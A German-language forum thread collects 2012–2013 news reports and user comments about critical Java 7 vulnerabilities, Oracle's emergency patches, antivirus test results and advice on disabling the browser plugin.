Oracle weiß angeblich seit über vier Monaten von der kritischen Java-Schwachstelle, die bereits aktiv für Angriffe ausgenutzt wird – hat aber immer noch nicht reagiert. Dafür gibt immerhin Microsoft mittlerweile Tipps zum Schutz vor Infektionen – aber die funktionieren nicht.
Auf der Security-Mailingliste Bugtaq berichtet der Forscher Gowdiak, dass seine Firma Security Explorations im Rahmen eines Forschungsprojekts zahlreiche Lücken in Java entdeckt und im April dieses Jahres vertraulich an den Hersteller gemeldet hat. Unter den gemeldeten Schwachstellen sollen sich auch die beiden befinden, die der jüngst aufgetauchte Exploit zum Abschalten der Java-Sandbox ausnutzt.
Nach eigenen Angaben des Forschers hat er Oracle sogar das Abschalten der Sandbox mit einem Proof-of-Concept demonstriert. Gowdiak hat zuletzt am 23. August einen Statusbericht von dem Unternehmen bekommen, laut dem 19 der 25 noch ungepatchten Lücken bereits intern im Quellcode geschlossen wurden – einschließlich der beiden, die jetzt aktiv ausgenutzt werden. Planmäßig würden diese Änderungen frühestens am nächsten Critical Patch Update (CPU) am 16. Oktober in die downloadbare Java-Version übernommen.
Der ganze Artikel (http://www.heise.de/security/meldung/Oracle-und-Microsoft-blamieren-sich-bei-Reaktion-auf-Java-Luecke-1695480.html)
Quelle : www.heise.de
-
Wer also Java auf dem Rechner installiert, sollte das bewusst tun und mindestens regelmäßig händisch updaten, zumal so auch versehentliche Mit-Installationen lästiger bis schädlicher Toolbars am sichersten zu vermeiden sind.
zumal auch nur die 32bit version automatisch aktualisiert wird.
bei der 64bit version musste ich mich bislang immer selbst darum kümmern.
-
Oracle hat soeben kommentarlos die Java-Version 7 Update 7 herausgegeben (http://www.java.com/de/download/manual.jsp), die offenbar eine hochkritische Schwachstelle beheben soll, welche bereits aktiv für Angriffe ausgenutzt wird. Der dazugehörige Security Alert (http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-verbose-1835710.html) auf der Herstellerseite war am heutigen Donnerstagabend noch leer, ein erster Test von heise Security zeigte jedoch, dass der Exploit in seiner bekannten Form nach dem Update tatsächlich blockiert wird. Auch eine von uns abgewandelte Exploit-Version wurde rechtzeitig gestoppt.
Wer Java auf seinem System installiert hat, sollte die neue Java-Version umgehend installieren. Das Sicherheitsproblem existiert in Java 7 bis einschließlich Update 6 in Verbindung mit allen unterstützen Betriebssystemen und Browsern. Durch die Schwachstelle kann ein Angreifer die Kontrolle über den Rechner übernehmen und etwa Schadcode installieren, wenn man eine präparierte Webseite ansurft.
-
Nicht einmal die Hälfte von 22 untersuchten Antivirenprogrammen schützt vor dem derzeit kursierenden Exploit, der eine hochkritische Schwachstelle in der Java-Version 7 Update 6 ausnutzt. Das kam bei einer im Auftrag von heise Security durchgeführten Analyse des Testlabors AV-Comparatives heraus.
Wir haben zwei Versionen des Exploits getestet: Erstens eine Basisversion, die im Wesentlichen auf dem veröffentlichten Proof-of-Concept beruhte und statt dem Taschenrechner das Notepad gestartet hat. Die zweite Variante haben wir um eine Download-Routine ergänzt, die eine EXE-Datei aus dem Internet auf die Platte schreibt. Als Testsystem kam Windows XP zum Einsatz, auf dem außer im Fall von Avast, Microsoft und Panda die Security-Suiten installiert waren.
(http://www.heise.de/imgs/18/9/1/1/8/4/6/msexploit-m-eb2f104b4d1a9bdc.png)
Von den 22 Testkandidaten konnten nur 9 die beiden Exploit-Variationen blockieren (Avast Free, AVG, Avira, ESET, G Data, Kaspersky, PC Tools, Sophos und Symantec). Gepatzt haben hingeben 12 Virenwächter (AhnLab, Bitdefender, BullGuard, eScan, F-Secure, Fortinet, GFI-Vipre, Ikarus, McAfee, Panda Cloud Antivirus. Trend Micro und Webroot). Microsofts kostenlose Security Essentials konnten zumindest die Basisversion des Exploits stoppen.
Bei den Ergebnissen ist zu beachten, dass sie eine Momentaufnahme vom 30. August um 13 Uhr sind und keine Rückschlüsse auf die Gesamtqualität der Virenschutzprogramme erlauben. Die getestete Java-Version war zu diesem Zeitpunkt aktuell, der Exploit-Code bereits seit mehreren Tagen im Umlauf.
Die Ergebnisse zeigen, dass man sich beim Schutz seines Systems nicht allein auf den Virenwächter verlassen darf. Auch die installierten Anwendungen und Plug-ins müssen gepflegt werden, damit sie Schädlingen keine Schlupflöcher bieten. Die kritische Java-Lücke hat Oracle allem Anschein nach am Donnerstagabend mit der Java-Version 7 Update 7 geschlossen. Wer Java auf seinem System installiert hat, sollte das Update umgehend einspielen.
Man kann davon ausgehen, dass sich der Exploit im Waffenarsenal der Cyber-Ganoven noch einige Jahre größter Beliebtheit erfreuen wird, da er plattformübergreifend funktioniert und sehr zuverlässig ist. Wie zuverlässig er ist, zeigt ein Blick in die Statistik einer Installation des BlackHole-Angriffsbaukastens: Durch den Einbau des Exploits beträgt die Erfolgsquote der Java-Exploits 75 bis 99 Prozent. Insgesamt konnte BlackHole jeden vierten Rechner infizieren – üblicherweise klappt das nur in einem von zehn Fällen.
Quelle : www.heise.de
-
Da wir gerade beim Thema sind:
Ich habe gerade mal nach einer Liste von Programmen gesucht, die
a) in Java programmiert sind oder
b) Java für bestimmte Zwecke benötigen (z.B.LibreOffice/OpenOffice)
So wirklich fündig wurde ich dabei nicht.
Kennt hier jemand eine Liste mit den "gängigsten" bzw. "bekanntesten" Programme, die in irgendeiner Form Java benötigen?
dvb_ss2
-
Spontan fallen mir da ProjectX, TVBrowser... die Mediathek und z.B. RSSOwl ein
-
Mir fallen da natürlich auch einige Programme ein, aber manche vllt. auch nicht?!?
- LibreOffice/Apache OpenOffice
- jAlbum (im Prinzip alle Programme die jProgramm heissen oder auch Programmj)
- FreeMind
- Jameica/Hibiscus (Onlinebanking) und weitere Plugins
- AVCHDCoder
- jPDFTweak
- ...
dvb_ss2
-
Wenn ich weiter drüber nachdenke fallen mir sicherlich auch noch einige ein ...aber ich wüsste nicht das es im WWW irgendwo so ne Auflistung gibt ...dafür sind das sicherlich viel zu viele ...von daher kann man sicherlich auch festhalten das man letztlich auf die Java Runtime nicht verzichten kann ...gleiches gilt für .NET ...
-
Es gibt auch wichtige Tools, die auf Java basieren, z.B. die beliebten jNetTools.
Die kommen direkt im .jar Format daher.
Und gerade so etwas behält man natürlich, seit die rechtliche Lage für solche Spielzeuge hierzulande heikel geworden ist.
Jürgen
-
Anfang dieser Woche wurde eine als äußerst kritisch einzustufende Schwachstelle in Java bekannt. Aus diesem Grund hat sich Oracle ebenfalls in dieser Woche dazu entschieden, einen Notfall-Patch zu veröffentlichen.
Die in Polen ansässigen Sicherheitsforscher aus dem Hause Security Explorations behaupten in einer an das Online-Portal 'Computerworld.com (http://www.computerworld.com/s/article/9230812/Researchers_find_critical_vulnerability_in_Java_7_patch_hours_after_release)' versendeten E-Mail, dass man in dem besagten Patch für Java eine kritische Sicherheitslücke ausfindig machen konnte. Damit soll es möglich sein, aus der Sandbox von Java auszubrechen.
Alle wichtigen Informationen in diesem Zusammenhang wurden von den Sicherheitsexperten an Oracle versendet. Dazu gehört auch ein funktionierender Proof-of-Concept-Angriffscode. Mit der Öffentlichkeit will man vorerst keine Details über die entdeckte Lücke teilen. Diesbezüglich will Security Explorations warten, bis Oracle einen Patch veröffentlicht.
Angesichts des Schweregrades der jüngst bekannt gewordenen Sicherheitslücke war die Empfehlung von Sicherheitsexperten bisher ganz klar: Das Java-Plugin sollte umgehend abgeschaltet werden. Üblicherweise veröffentlicht Oracle nur alle vier Monate entsprechende Updates. Zum frühzeitigen Release eines Updates haben sich die Entwickler entschieden, da die Schwachstelle bereits aktiv angegriffen wurde.
Quelle : http://winfuture.de
-
Der polnische Sicherheitsforscher Adam Gowdiak hat eine weitere Schwachstelle in Java gefunden, durch die ein Angreifer die Sandbox umgehen kann. Dies gab er auf der Mailingliste Full Disclosure bekannt. Durch die Lücke kann das im Browser ausgeführte Java-Applet mit den Rechten des angemeldeten Nutzers auf dem System wüten und etwa Schadcode platzieren.
Der ganze Artikel (http://www.heise.de/security/meldung/Forscher-entdeckt-weitere-Java-Luecke-1717595.html)
Quelle : www.heise.de
-
Die Firma Oracle hat Updates des Development-Kits für die Standardausgabe der Java-Plattform veröffentlicht. Das JDK ist in Version 7u10 auch für Mac OS X 10.8 und Windows 8 zertifiziert und wurde besonders in puncto Sicherheit verbessert.
So lässt sich jetzt unter anderem über das Java Control Panel einstellen (unter Windows auch über die Kommandozeile möglich), ob Java-Anwendungen im Browser laufen sollen oder nicht. Darüber hinaus kann dort eins von vier Sicherheits-Leveln für nicht signierte Applets, für Anwendungen, die Java Web Start nutzen und für im Browser laufende, eingebettete JavaFX-Apps gewählt werden. Stellt die verwendete Java-Laufzeitumgebung aufgrund ihres Alters oder der eingestellten Anforderungen eine Sicherheitslücke dar, wird wohl außerdem in der aktualisierten JDK-Version ein Warndialog mit Aufforderung zum Update angezeigt.
Eine Liste aller behobenen Fehler und die Release Notes mit weiteren Informationen zum Update sind auf Oracles Webseite zu finden. Das JDK findet sich im Download-Bereich der Java-SE-Seite.
Quelle: www.heise.de
-
In der aktuellen Java-Version 7 Update 10 klafft eine kritische Sicherheitslücke, die offenbar bereits im großen Stil für Cyber-Angriffe ausgenutzt wird. Wer Java auf seinem Rechner installiert hat, sollte das Java-Plug-in im Browser umgehend deaktivieren.
Ein Malware-Forscher mit dem Pseudonym kafeine hat im Netz einen Exploit entdeckt, der eine bislang unbekannte Java-Schwachstelle ausnutzt. Die Sicherheitsexperten von AlienVault analysierten den Exploit daraufhin und bestätigen die Brisanz des Funds: Es gelang ihnen damit, Code in ein vollständig gepatches Windows-System mit Java 7 Update 10 einzuschleusen. Unklar ist derzeit noch, ob die Lücke auch in dem 6er Versionszweig klafft. Bei einem ersten Test von kafeine zündete der Exploit unter Java 6 nicht.
Der ganze Artikel (http://www.heise.de/security/meldung/Gefaehrliche-Luecke-in-aktueller-Java-Version-1780850.html)
Quelle : www.heise.de
-
Das Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor der gefährlichen Schwachstelle in der aktuellen Java-Version, die bereits zur Verbreitung von Schädlingen missbraucht wird. Das BSI rät, Java vollständig zu deinstallieren, bis ein Patch verfügbar ist. Ansonsten soll man zumindest die Plug-ins der Browser abschalten.
Wer die Warnung ignoriert und weiterhin mit aktivem Java im Netz unterwegs ist, handelt fahrlässig, denn der Angriffscode kann überall lauern. Immer wieder werden auch seriöse Webseiten nach Hackerangriffen als Virenschleuder missbraucht. Um Opfer einer Malware-Infektion zu werden, muss man die manipulierte Webseite lediglich aufrufen.
Bei einer Analyse eines Angriffs stellte sich heraus, dass die Schwachstelle bereits dafür genutzt wird, um die spanische Ausgabe des BKA-Trojaners zu verbreiten. Man muss fest damit rechnen, dass ähnliche Attacken auch bereits gegen deutsche Nutzer gefahren werden. In prominenten Exploit-Kits wie Black Hole ist ein passendes Angriffsmodul bereits enthalten. Oracle hat sich bislang nicht dazu geäußert, ob und wann ein Patch verfügbar sein wird.
Quelle : www.heise.de
-
Soll das jetzt so aussehen... :hmm
(http://i.imgur.com/oSFrY.png)
-
Soll das jetzt so aussehen...
Je nach Systemsprache, ja, unbedingt.
Sollte man für eine bestimmte Seite doch unbedingt das Java-Plugin brauchen, dann empfiehlt es sich dringend, nur dafür einen extra Browser zu betreiben, und zwar tunlichst eine eigentlich portable Version, die keine Orte außerhalb ihres eigenen Ordnersystems anrührt.
Oder auch umgekehrt.
Wie auch immer, nach jeder Browser- oder Java-Aktualisierung ist die Deaktivierung nochmals zu prüfen.
Jürgen
-
Wegen einer gefährlichen Schwachstelle in Java deaktiviert Mozilla das Java-Plug-in im Firefox-Browser automatisch ab Version 17 auf allen Plattformen. Beim Besuch einer Website mit Java-Plug-in wird der Surfer nun auch bei den neueren Java-Versionen gefragt, ob das Plug-in für diese Sitzung oder generell wieder aktiviert werden soll. Apple scheint laut einer Meldung bei macrumors und deaktiviert alle bisherigen Java-Plug-ins, indem es über die Plug-in-Blacklist eine noch nicht veröffentlichte Version von Java 7 verlangt.
Quelle : www.heise.de
-
Wie verschiedene US-Medien berichten, hat Oracle angekündigt, kurzfristig einen Patch für die vor wenigen Tagen entdeckte Zero-Day-Lücke in Java bereitzustellen. Der Fehler hatte unter anderem das deutsche BSI und das US-Heimatschutzministerium zu Warnungen veranlasst. Mozilla und Apple deaktivierten das Java-Plug-in in ihren Browsern. Betroffen ist nur die aktuelle Version 7 von Java.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Oracle-kuendigt-Patch-fuer-0-Day-Luecke-in-Java-an-1782827.html)
Quelle : www.heise.de
-
(http://www.golem.de/1301/sp_96887-51349-i.jpg)
Java 7 Update 11 schließt Sicherheitslücke.
(Bild: Andreas Donath/Golem.de)
Mit einem Patch außerhalb der Reihe hat Oracle die Ende vergangener Woche bekanntgewordene Sicherheitslücke in Java 7 beseitigt. Nutzer sollten dringend auf die neue Version Java SE 7 Update 11 umsteigen.
Oracle schließt mit Java SE 7 Update 11 die in der vergangenen Woche bekanntgewordene Zero-Day-Lücke in Java, die in den vergangenen Tagen bereits aktiv ausgenutzt wurde. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) riet Nutzern aufgrund der Sicherheitslücke, für die zunächst kein Patch existierte, Java zu deinstallieren.
Darüber hinaus verändert das Update die Standardeinstellung des Java Security Level von "mittel" auf "hoch". Dadurch können unsignierte Java-Web-Apps nur noch nach ausdrücklicher Bestätigung des Nutzers ausgeführt werden. Bei der zuvor geltenden Einstellung "mittel" wurden solche Apps ungefragt ausgeführt, solange der Nutzer die aktuelle Java-Version installiert hatte. So will Oracle verhindern, dass Sicherheitslücken künftig unbemerkt ausgenutzt werden können.
Java SE 7 Update 11 steht unter oracle.com (http://www.oracle.com/technetwork/java/javase/downloads/index.html) ab sofort zum Download bereit. Oracle rät Anwendern, das Update möglichst schnell einzuspielen.
Quelle: www.golem.de
-
Siehe auch hier : http://beta.dvbcube.org/index.php?topic=6030.msg183472#msg183472
Gibts auch bereits portable -> http://beta.dvbcube.org/index.php?topic=6592.msg183475#msg183475
-
Schön finde ich die Möglichkeit, dass man nun direkt in den Java-Einstellungen die Browser-Unterstützung deaktivieren kann.
Auch beim Update bleibt die Einstellung so vorhanden!
dvb_ss2
-
Ich wollte grad aktualisieren da man meinen Bruder via Firefox an seinem Onlinspiel ohne Update nicht mehr teilnehmen lässt. Über 30 Minuten DL Zeit beim Oracle.... ich kuck die Tage noch mal vorbei :ha
-
Das US-CERT rät weiterhin vom Einsatz von Oracles Java ab – wer Java nicht braucht, sollte es auch nach dem letzten Update deaktivieren oder deinstallieren. Das CERT stützt seine Vorsicht auf Erkenntnisse von Sicherheitsforschern von Immunity. Demnach soll die gefährliche Lücke, die das Einschleusen von Code über kompromittierte Webseiten ermöglicht, mit dem Patch gar nicht geschlossen worden sein. Das Bundesamt für Sicherheit in der Informationstechnik (BSI) gibt hingegen Entwarnung. Mit Einspielen des Updates "können auch die Browser-Plugins wieder aktiviert und genutzt werden".
Sein neu angefachtes Misstrauen drückt das US-CERT mit einem Update in seiner Warnung vor den Java-Sicherheitslücken aus. Mit der weiteren Deaktivierung von Java könne man die Folgen abschwächen, die drohen, "wenn in Zukunft andere Java-Sicherheitslücken gefunden werden."
Zudem hat Immunity Oracles Update unter die Lupe genommen und die Ergebnisse in einem Blogeintrag veröffentlicht. Die Bilanz: Oracle hat mit dem Update nur eine der beiden Lücken gestopft. Finden Kriminelle eine neue Zero-Day-Lücke als Einstiegstor, wird die Lücke wieder ausnutzbar. Von den Kriminellen genutzte Exploit-Tools müssten dann nur noch angepasst werden und wären schnell wieder im Einsatz. Die Sicherheitsforscher weisen deshalb darauf hin, dass es gerade heute wichtig ist "jedem einzelnen Bug besondere Aufmerksamkeit zu schenken."
Was zukünftige Angriffe seit dem Update allerdings erschwert, ist die von Oracle vorgenommene Veränderung der Sicherheitseinstellungen für Applets – dadurch wurde das Vertrauen gegenüber unsignierten Applets herabgesetzt; Nutzer werden gewarnt. Exploits sollten diese Signatur nur schwerlich erhalten.
Quelle: www.heise.de
-
Nur 24 Stunden nachdem Oracle eine gefährliche Sicherheitslücke mit dem Update auf Java 7u11 gepatcht hat, behauptet ein Krimineller laut "Krebs on Security", dass es eine weitere Zero-Day-Lücke gibt, die er bereits in einschlägigen Foren verkauft hat. Wie Brian Krebs schreibt, wurde der Exploit mit der neuen Lücke für mindestens 5.000 US-Dollar pro Kopf an zwei Interessierte verkauft. Der Verkäufer amüsierte sich darüber, dass Oracle "schon wieder versagt" hat.
Schon kurz nach Oracles Update Anfang dieser Woche beanstandeten Sicherheitsforscher Adam Godwiak und Sicherheitsforscher von Immunity die Patch- und Updatepraxis des Unternehmens. Immunity stellte sogar heraus, dass Oracle nicht – wie angegeben – zwei, sondern nur eine kritische Sicherheitslücke mit Java 7u11 stopfte. Wenn ein neuer Zero-Day auftauchen würde, könnten Kriminelle ihre bereits genutzten Exploit-Kits reaktivieren. Das US-CERT nahm diese Erkenntnisse zum Anlass, weiterhin vor dem Java Browser-Plugin zu warnen. Das Bundesamt für Sicherheit in der Informationstechnik gab hingegen Entwarnung.
Brian Krebs gibt an, dass er über seine kritische Berichterstattung zu Oracle mit einigen Lesern über Twitter in Streit geriet, aber an seiner Meinung festhalte: Das Unternehmen scheine sich nicht bewusst zu sein, dass seine Software "auf Hunderten von Millionen Computern" verbreitet ist. Und mit seinem Service "scheint Oracle eine Nachricht zu verbreiten: Oracle möchte keine Hunderte von Millionen Kunden - und diese sollten bei dieser Nachricht aufhorchen und dementsprechend reagieren."
Quelle: www.heise.de
-
Adam Gowniak ist unermüdlich: Kaum hat Oracle einen Eil-Patch für die 0-Day-Lücke in Java bereitgestellt, findet der Sicherheitsforscher das nächste Einfallstor. In einem Beitrag auf der Mailingliste Full Disclosure verrät er dazu nur, dass ihn die fehlerhafte MBeanInstantiator-Methode Inspirationen bei der Suche nach weiteren Lücken inspiriert habe. Zuvor hatte schon Brian Krebs auf einen neuen Exploit hingewiesen, den der Oracle-Patch nicht ausbremst. Ob es sich um dieselbe Schwachstelle handelt, ist nicht klar.
Der ganze Artikel (http://www.heise.de/security/meldung/Oracles-Java-Patch-laesst-Schlupfloch-offen-1787517.html)
Quelle : www.heise.de
-
Sicherheitsforscher Adam Gowdiak weist darauf hin, dass die von Oracle gerade erst eingeführte neue Sicherheitsmaßnahme für das Java-Browser-Plugin bereits umgangen werden kann. So hatte Oracle mit dem letzten Java-Update die Sicherheitseinstellungen für im Browser ausgeführte Applets von "Medium" auf "Hoch" gesetzt, wodurch das Ausführen unsignierter Applets nun an eine Bestätigung durch den Nutzer gekoppelt ist. Dies sollte verhindern, dass Applets einfach geladen werden.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Neue-Java-Schutzfunktion-bereits-ausgehebelt-1793460.html)
Quelle : www.heise.de
-
Eigentlich wollte Oracle die nächsten Updates für seine Laufzeitumgebung Java erst am 19. Februar veröffentlichen. Da die Sicherheitslücken im aktuellen Java 7 Update 11 bereits ausgenutzt werden, wurde das Update 13 als Notmaßnahme nun um zwei Wochen vorgezogen. "Angesichts der Gefahr eines erfolgreichen Angriffs" empfiehlt Oracle in seinem Critical Patch Update Advisory, die Aktualisierung möglichst schnell einzuspielen.
Das aktuelle Update soll die von Browsern eingebundene Java-Laufzeitumgebung (JRE) wieder surfsicher machen. Dem Hersteller zufolge enthält es insgesamt 50 Korrekturen für alle aktuell unterstützten Java-Varianten. 26 der Sicherheitsrisiken bewertet Oracle mit der höchsten Stufe 10, zwei mit Stufe 9,3. Bis auf eine sind alle Lücken von außen zugänglich; die Ausnahme betrifft den Java-Installationsprozess.
Der ganze Artikel (http://www.heise.de/security/meldung/Grosses-Notfall-Update-fuer-Java-1796504.html)
Quelle : www.heise.de
Siehe auch hier (http://beta.dvbcube.org/index.php?topic=6030.msg184309#msg184309) und hier (http://beta.dvbcube.org/index.php?topic=6592.msg184335#msg184335).
-
Oracle hat einen weiteren Java-Patch für den 19. Februar angekündigt, um das Notfall-Update vom 1. Februar zu ergänzen. Das Notfall-Update auf die Versionen 7u13 und 6u39 war veranlasst worden, da Kriminelle einige Sicherheitslücken bereits ausnutzten – dadurch hatte Oracle das eigentlich geplante Update vom 19. Februar auf den 1. Februar vorgezogen.
Wie das Unternehmen schreibt, müsse nun aufgrund des vorher herrschenden Zeitdrucks "eine kleinere Zahl von Fixes" nachgeliefert werden. Um welche "Fixes" es sich genau handelt, wird Oracle mit dem Update bekannt geben.
Quelle : www.heise.de
-
In der Nacht zum heutigen Mittwoch hat Oracle das angekündigte Update zum erst vor drei Wochen außer der Reihe erschienenen "Critical Patch Update" veröffentlicht. Betroffen sind alle Java-Laufzeitumgebungen ab Version 1.4 bis zur aktuellen Version 7.
Dieses Update soll drei Lücken schließen, die Oracle der höchsten Gefährdungsstufe 10 zuordnet. Sie sind mit den CVE-Nummern 2013-1484, 2013-1486 und 2013-1487 gekennzeichnet und über das Netzwerk ohne Authentifizierung ausnutzbar. Betroffen sind Bibliotheken, Deployment-Komponenten und erneut JMX. Diese Java Management Extensions standen bereits in der Vergangenheit im Zentrum von Lücken, die der Sicherheitsforscher Adam Gowdiak aufdeckte.
Der ganze Artikel (http://www.heise.de/security/meldung/Oracle-stopft-Sicherheitslecks-Updates-fuer-Java-1-4-bis-7-1806522.html)
Quelle : www.heise.de
-
Auch das bislang letzte Sicherheitsupdate für das Java Browser Plug-In auf die Version 7u15 hat die Software nicht abgedichtet. Das Unternehmen Security Explorations hat eine neue Schwachstelle entdeckt und Oracle mit einem Proof of Concept informiert. Gleichzeitig kursieren Exploits für die ältere Java-Version 7u11. Wer die letzten Updates verpasst hat, sollte sich beeilen und updaten oder besser: Java deinstallieren.
Adam Gowdiak, Geschäftsführer von Explorations, meldete Oracle die neuen Sicherheitslücken mit den Nummern 54 und 55 am 25. Februar. Werden beide Schwachstellen in Kombination ausgenutzt, kann die Java-Sandbox umgangen werden. Kriminelle könnten so Schadcode in Rechner einschleusen – wie bei Facebook, Apple und Microsoft geschehen. Wie Gowdiak gegenüber Softpedia kommentierte, würde dafür das "Reflection API auf sehr interessante Weise" ausgenutzt. Oracle antwortete Gowdiaks Unternehmen, dass es den Sicherheitsreport nachvollziehen könne und sich um das Problem kümmere.
Derweil meldet die Sicherheitsfirma Rapid7, dass nun ein Metasploit-Modul für Lücken in Java 7u11 im Netz kursiert und Exploits für Java 7u11 in Exploit Kits wie Cool EK und Popads integriert wurden. Diese klopfen die Systeme von Opfern, wie kürzlich bei dem Angriff auf Sparkasse.de, systematisch nach bekannten Sicherheitslücken ab. Wer also die letzten Updates noch nicht eingespielt hat, sollte dies schleunigst tun.
Alle, die genug von Hiobsbotschaften haben und das Plug-in eigentlich nicht benötigen, sollten Java deinstallieren.
Quelle: www.heise.de
-
Cyber-Kriminelle nutzen bislang unbekannte Schwachstellen in den aktuellen Java-Versionen zur Verbreitung von Malware aus, wie die Sicherheitsfirma FireEye berichtet. Durch die Lücke können die Angreifer auf den Speicher der Java Virtual Machine (JVM) zugreifen. Dort sucht der Exploit etwa nach dem Bereich, der festlegt, ob der SecurityManager aktiv ist und versucht diesen mit einer Null zu überschreiben. Der SecurityManager schirmt Systemzugriffe von Web-Applets ab. Nach dem Deaktivieren kann der Exploit ungehindert die nachgeladene Malware ausführen.
Laut FireEye ist der gesichtete Exploit nicht besonders zuverlässig, weil er große Datenblöcke im Speicher überschreiben will. Es dürfte aber nur eine Frage der Zeit sein, bis ihn die Ganoven weiter perfektioniert haben. Die Lücke klafft sowohl in der Java-Version 7 Update 15 als auch in Version 6 Update 41. Der 6er Versionszweig wird nicht mehr aktiv von Oracle gepflegt.
Schützen kann man sich, indem man Java komplett deinstalliert oder zumindest innerhalb der Browser abschaltet. Nützlich ist auch die Click-to-Play-Funktion von Firefox und Chrome, durch die man der Ausführung von Plug-ins zunächst explizit zustimmen muss. Unklar ist bislang noch, ob es sich um die gleichen Schwachstellen handelt, die der Sicherheitsforscher Adam Gowdiak vor kurzem entdeckt und an Oracle gemeldet hat
Quelle: www.heise.de
-
(http://www.golem.de/1303/sp_97925-51349-i_rc.jpg)
Oracle wusste seit 1. Februar 2013 von der
Sicherheitslücke. (Bild: Andreas Donath/Golem.de)
Oracle hat ein weiteres Sicherheitsupdate für Java veröffentlicht und schließt damit zwei Sicherheitslücken, von denen eine seit vergangener Woche aktiv ausgenutzt wird. Allerdings weiß Oracle bereits seit 1. Februar von dem Problem.
Nachdem Ende vergangener Woche eine weitere Sicherheitslücke in Java bekanntwurde, die von Angreifern bereits aktiv ausgenutzt wird, hat Oracle jetzt eine korrigierte Java-Version veröffentlicht. Das wirkt, als hätte Oracle binnen weniger Tage auf das Problem reagiert, doch die Wahrheit ist: Oracle wurde nach eigenen Angaben bereits am 1. Februar 2013 über die Sicherheitslücken informiert. Das aber war zu spät, um die Korrekturen in das am 19. Februar 2013 veröffentlichte Sicherheitsupdate für Java aufzunehmen.
Betroffen von den Sicherheitslücken sind Java 7 bis einschließlich Update 15, Java 6 bis einschließlich Update 41 und Java 5 bis einschließlich Update 40. Nur für Java 7 stellt Oracle mit Java 7 Update 17 eine Korrektur zur Verfügung.
Java 7 Update 17 schließt zwei Sicherheitslücken (CVE-2013-1493 und CVE-2013-0809), die beide in der 2D-Komponente von Java SE stecken und nur Nutzer gefährden, die Java im Browser nutzen. Eigenständige Java-Applikationen sind nicht betroffen.
Eigentlich hatte Oracle geplant, die Korrektur für CVE-2013-1493 erst mit dem kommenden Critical Patch Update für Java SE auszuliefern, das am 16. April veröffentlicht werden soll. Nachdem die Sicherheitslücke aber bereits aktiv ausgenutzt wird, entschied sich Oracle zur Veröffentlichung des aktuellen Notfall-Updates. Oracle will damit auch deutlich machen, dass das Unternehmen gewillt ist, Sicherheitsupdates für Java früher zu veröffentlichen als in der Vergangenheit.
Oracle rät allen Java-Nutzern, das Update möglichst umgehend einzuspielen.
Nachtrag vom 5. März 2013, 11:25 Uhr:
Trotz des Updates gibt es laut dem polnischen Sicherheitsspezialisten Adam Gowdiak weitere unveröffentlichte Sicherheitslücken in Java, die Oracle bekannt sind, in Java 7 Update 17 aber nicht korrigiert wurden.
Quelle: www.golem.de
-
(http://www.heise.de/imgs/18/9/9/2/7/2/6/f19063a87b603210.png)
Beim Aufruf des Online-Wörterbuchs Beolingus der TU Chemnitz erschien eine Abfrage, ob der Anwender eine Java-Anwendung ausführen möchte. Das angebliche "Java ClearWeb Security Update" trug eine anscheinend gültige digitale Unterschrift der Firma CLEARESULT CONSULTING INC. Doch wer auf "Run" klickte, infizierte seinen Rechner mit Schad-Software, berichtet der Blogger Eric Romang.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Java-pfuscht-bei-Zertifikatschecks-1817775.html)
Quelle : www.heise.de
-
Das heute veröffentlichte Java 7 Update 21 schließt 42 kritische Sicherheitslücken und erhöht die Abfragen, wenn Java-Code auf angesteuerten Webseiten ausgeführt werden soll.
Mit Java 7 Update 21 hat Oracle nach eigenen Angaben 42 kritische Sicherheitslücken Java geschlossen. Das Update wird am heutigen 16. April 2013 im Rahmen der vierteljährlichen Patch-Reihe veröffentlicht. Oracle hat zusätzlich weitere Sicherheitsabfragen in Java integriert, die den Anwender warnen sollen, wenn er Webseiten ansteuert, die Java-Code ausführen wollen. In einigen Fällen muss der Anwender das Ausführen des Codes bestätigen.
Der ganze Artikel (http://www.golem.de/news/java-update-schliesst-luecken-und-erhoeht-abfragen-1304-98756.html)
Quelle : www.golem.de
-
Oracles steter Mahner in Sachen Security, der polnische Sicherheitsforscher Adam Gowdiak, hat nach eigenen Aussagen dem Java-Hersteller eine neue Schwachstelle gemeldet – Nummer 61 nach seiner Zählung. Betroffen ist die aktuelle Java Standard Edition 7, einschließlich der soeben erst veröffentlichten Version.
Der ganze Artikel (http://www.heise.de/security/meldung/Neue-Java-Sicherheitsluecke-betrifft-Desktop-Systeme-und-Server-1847982.html)
Quelle : www.heise.de
-
Der Interessenverbund der deutschsprachigen Java User Groups (iJUG) hat die Maßnahmen für ein sichereres Java begrüßt, die Oracle im Mitte April erschienenen Java 7 Update 21 vorgenommen hatte. Bei diesem muss man Applets signieren, damit sie keinen Alarm auslösen; unsignierte Applets werden nur noch nach ausdrücklicher Bestätigung durch den Benutzer ausgeführt. Das hatte jüngst CERT/CC-Entwickler auf den Plan gerufen, die zum Nichtsignieren der Applets aufforderten, da die Erlaubnis, ein Java-Applet auszuführen, gleichzeitig bedeute, den unbeschränkten Zugriff auf das System aus der Hand zu geben.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Sicherheitsluecken-in-Java-User-Groups-fordern-von-Oracle-weitere-Schritte-1857434.html)
Quelle: www.heise.de
-
Oracle hat angekündigt (http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html), am 18. Juni ein Update für die Java-SE-Versionen 5, 6 und 7 sowie für JavaFX 2.2 zu veröffentlichen. Es soll 40 Lücken in der Client-Software schließen, von denen 37 remote und ohne Authentifizierung zu nutzen sind. Darunter befinden sich auch Schwachstellen der höchsten Gefährdungsstufe 10.
Dies soll das letzte Java-Update außerhalb des Oracle-üblichen dreimonatlichen Patch-Cyklus sein. Ab Oktober will der Hersteller die Patches dafür zusammen mit denen für alle anderen Produkte veröffentlicht. Allerdings musste er in diesem Jahr bereits mehrfach Java-Updates außerhalb der Reihe herausgeben, um Zero-Day-Lücken zu schließen.
Quelle : www.heise.de
-
Sicherheitsexperten haben Schadsoftware entdeckt, die eine vor Monaten geschlossene Java-Lücke ausnutzt, um ein Botnetz aufzubauen. Das Programm läuft auf Windows, Linux und Mac OS X; Abhilfe ist einfach möglich.
